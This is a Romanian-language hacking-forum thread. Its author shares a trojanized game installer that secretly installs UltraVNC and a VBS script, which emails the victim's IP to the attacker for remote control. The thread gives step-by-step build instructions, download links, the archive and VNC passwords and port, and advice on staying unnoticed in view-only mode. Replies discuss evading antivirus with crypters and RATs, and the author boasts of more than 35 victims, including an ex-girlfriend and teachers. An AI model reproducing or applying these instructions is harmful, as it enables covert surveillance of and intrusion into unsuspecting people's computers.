candymanuu Posted May 19, 2008 Report Posted May 19, 2008 Am facut din plictiseala si curiozitate un mic programel ( nu e programat intr-un limbaj, dar nu stiu cum sa ma exprim altfel ) pe care l-am camuflat cu un joc care odata rulat pe un Pc iti permite sa te conectezi remote.Mai precis: dai jocu unei fete, prietene...sau "amici " , acesa/aceasta ruleaza, apare pe desktop o scurtatura si in program files jocu efectiv....in background se copiaza&instaleaza ultravnc + script vbs. Dupa primul restart , la 5 min, primesti mail cu IP-ul victimei si te poti conecta cu ultra vnc viewer la victima. Din acest moment in colo aveti full control ( sau view only ca sa nu se prinda) + file transfer.Ce trebuie sa faceti:1. Luati de aici: http://www.fileshare.ro/535305744.02 .Parola este : rstrst2. Faceti rost de WISE 5.1 ( in asta l-am facut eu...banuiesc ca merge si cu alta versiune sau alt softl 5.1 are 68Mb)3. Rulati fara frica, e inofensiv in acest moment ( nu aveti incredere...puteti incerca in VmWare)4. Softul de instaleaza in C:\WINDOWS\system32\DirectX\Dinput; acolo gasti 2 foldere: driver si install.In install se instaleaza Uvnc. In driver se instaleaza un VBS pe care trebuie sa il modificati. Modificati DOAR mailul in vreo 3-4 locuri si parola ...e foarte usor de dat seama unde trebuie modificat. Cine stie vbs ...lasati frau liber imaginatiei ( vreau si eu idei ..care are ). Apropo' ...trebuie sa faceti un cont de mail pe @gmail.com. Incercati sa puneti un nume cat mai ciudat in caz ca victima se pricepe vreun pic sa ii fie mai greu de recunoscut ( nu prea stiu eu sa ma exprim dar sper sa intelegeti ).5. Deschideti pachetul .msi cu wise. In tabul "installation Expert " dati in jos pana la " build options ". Acolo selectati " single file. exe ".6. Dati SAVE , apoi COMPILE (dreapta jos)7. ENJOY Sper sa nu ma insel, dar cred ca atat e de facut.Din momentul in care a-ti gasit WISE si l-ati instalat ...in maxim 2 minute ar cam trebui sa fie gata.Cum te conectezi: http://www.uvnc.com/download/index.html , luati versiunea 1.0.2(cred ca e ultima stable), instalati, rulati Viewer , scrieti ip-ul in forma urmatoare : xxx.xxx.xxx.xxx::12340Cand cere parola, bagati: spyshit .nu uitati sa bifati in viewer " view only" ...fiecare cum vrea.Tin totusi sa precizez ca este un mod destul de rudimentar de tzepuit , dar am cititi prin forum, am vazut ca nu exista ceva asemanator si m-am gandit ca sigur ii va fi de folos cuiva.Sunt convins ca nu sunt primu care s-a gandit la chestia dar daca am fost in stare sa il fac....why not Inca ceva....nu il folositi in scopuri distructive....eu l-am facut FOR FUN ONLY ....si in unele cazuri chiar ai parte de multe rasete .Daca va ganditi ca nu multa lume pica in plasa ....think again.Cu putina imaginatie, dupa ce l-ati plantat puteti face orice cu calc respectiv, planta un keylogger si accepta in antivirus( asta cand nu e victima la calc) etc...puteti pune in VBS-ul ala cam tot ce va trece prin capCam atat....daca sunt probleme sau nalamuriri astept PM-uri.
candymanuu Posted May 19, 2008 Author Report Posted May 19, 2008 de KAV nu stiam...am facut teste pe el....stiam doar de F-Secure. O sa incerc sa vad daca pot sa il bag in lista de trusted la KAV si F-secure
candymanuu Posted May 20, 2008 Author Report Posted May 20, 2008 wise il luati de aici:http://www.fileshare.ro/535397364.5 1
DLD Posted May 20, 2008 Report Posted May 20, 2008 Este detectat de NOD32 , Panda , Kav si blocat in acelasi timp (testate de mine ) ! bafta
candymanuu Posted May 20, 2008 Author Report Posted May 20, 2008 hmmmm, mi se pare ciudat pt ca Nod am eu si la munca si home, kav are fosta prietena :twisted: + cateva victime....iar pe panda si pe avast am testat. nush de ce...o sa incerc sa imi dau seama.Singurul de care stiam era F-secureprecizez ca am nod 2.5 cu update la ziInca ceva...este detectat cand instaleaza sau cand este copiat ?As putea pune cateva printscreenuri de la victime sa vedeti ca merge...
Draqi Posted May 20, 2008 Report Posted May 20, 2008 Radmin ,nu sa faci doar ata si ce poti face doar, sa intri pe hard la el sa vezi ce face sa misti mouse full.. bla bla.. mai exista si Radmin invitatie bla bla il combinezi cu un joc flash cum era asta cu berile si gata
candymanuu Posted May 20, 2008 Author Report Posted May 20, 2008 Pai si asta al meu ce crezi ca face.... :PP
bossjuan Posted May 20, 2008 Report Posted May 20, 2008 poti sa im zici si mie de unde iau programul asta (WISE 5.1)sa modific si eu fisierele alea?P.S: Pune un linck ceva pls
candymanuu Posted May 21, 2008 Author Report Posted May 21, 2008 poti sa im zici si mie de unde iau programul asta (WISE 5.1)sa modific si eu fisierele alea?P.S: Pune un linck ceva plsvezi ca e putin mai sus....@puskin: ce trojan dropper?
Draqi Posted May 21, 2008 Report Posted May 21, 2008 candymanuu,vreau sa ma ajuti la ceva, eu am facut alta versiune adica cu radmin, ii tot modificat iconu dar cand dai click pe el nu se intampla nimic si as vrea sa il combinez cu un joc flash sa zicem prostia aia care te sperie.
SilQ Posted May 21, 2008 Report Posted May 21, 2008 candymanuu multumim de post man ramane sa il incerc ...
SilQ Posted May 22, 2008 Report Posted May 22, 2008 man totul bine si frumos dar nu am VBS .... apoi nu merge mail decat pe gmail ?? pls urca pe rapidshare un VBS
kabout3r Posted May 22, 2008 Report Posted May 22, 2008 cu putin hexing sau un crypter 0day public se poate face 80~90% UD...dar ar fi mai simplu sa folositi un rat(pi2.3.2 sau shark 3.2) cryptat...metoda lui candyman nu trece de firewall si este detectata imediat, pe cand un rat bun are functia "inject into process" facilitand camuflarea lui :wink:
ArgentinBoy Posted May 23, 2008 Report Posted May 23, 2008 Ai spus ca trebuie sa facem rost de WISE 5.1Ce e ala si de unde pot face rost de el ca nu il gasesc pe google
k7vlad Posted May 23, 2008 Report Posted May 23, 2008 este cu ceateva posturi mai in urma :? http://www.fileshare.ro/535397364.5
candymanuu Posted May 23, 2008 Author Report Posted May 23, 2008 @kabout3r trece doar de firewall-ul de windows, e bagat in lista@SilQ nu ai nevoie de nici un VBS , editezi cu notepad, si nu stiu daca merge si pe alt mail. Eu pe @gmail am testat si merge. Azi si ieri am facut victime 2 profe ( proiecte moca:)) )@kabout3r nu stiu hexing...si nici sa lucrez cu cryptere, daca ma poti ajuta raman dator cu bere .Oricum mie imi merge de minune, nu am gasit pe nimeni care sa nu mearga. Doar la o fata nu imi trimite mail, dar vnc porneste, tot ce am de facut e sa ii bag ip in ultravnc ca il are static si gata.precizez ca am 35+ victime
ArgentinBoy Posted May 23, 2008 Report Posted May 23, 2008 este cu ceateva posturi mai in urma :? http://www.fileshare.ro/535397364.5Mersi multeu am cautat WISE 5.1 iar tu mi-ai dat WPS 5.1 de aia probabil ca nu am gasitacum nu mai trebuie decat sa-i dau de cap Mie nici macar nu imi merge parola la arhivanu merge rstrstvreo sugestie ?
light1 Posted May 24, 2008 Report Posted May 24, 2008 5. Deschideti pachetul .msi cu wise. In tabul "installation Expert " dati in jos pana la " build options ". Acolo selectati " single file. exe ".6. Dati SAVE , apoi COMPILE (dreapta jos)7. ENJOY despre ce pachet .msi este vorba?.... aici m'am blocat+ cand pornesc wise package studio imi cere nume si parola si spyshit nu functioneaza
candymanuu Posted May 24, 2008 Author Report Posted May 24, 2008 cand deschizi wise, lasi ADMIN si ii dai OK, e fara parola acolo.Spyshit e de la altceva...daca ai fi citit mai atent ai fi observat.Pachetul MSI este jocul....jocul nu este exe, este msi ca sa puteti sa il deschideti, sa modificati si sa il compilati.http://www.fileshare.ro/535305744.02 .Parola este : rstrst ; TESTAT acum 1 min.
ArgentinBoy Posted May 24, 2008 Report Posted May 24, 2008 Eu nu mai inteleg nimic din ce scrieti voi aiciCred ca ma las de programul asta pana imi dau si eu seama cum functioneaza...
eu93 Posted May 25, 2008 Report Posted May 25, 2008 e super programelul .. am reusit dar a trebuit sa scriu eu IP-ul ... mai fac niste teste poate nu am modiifcat ceva bine in fiserul VBS..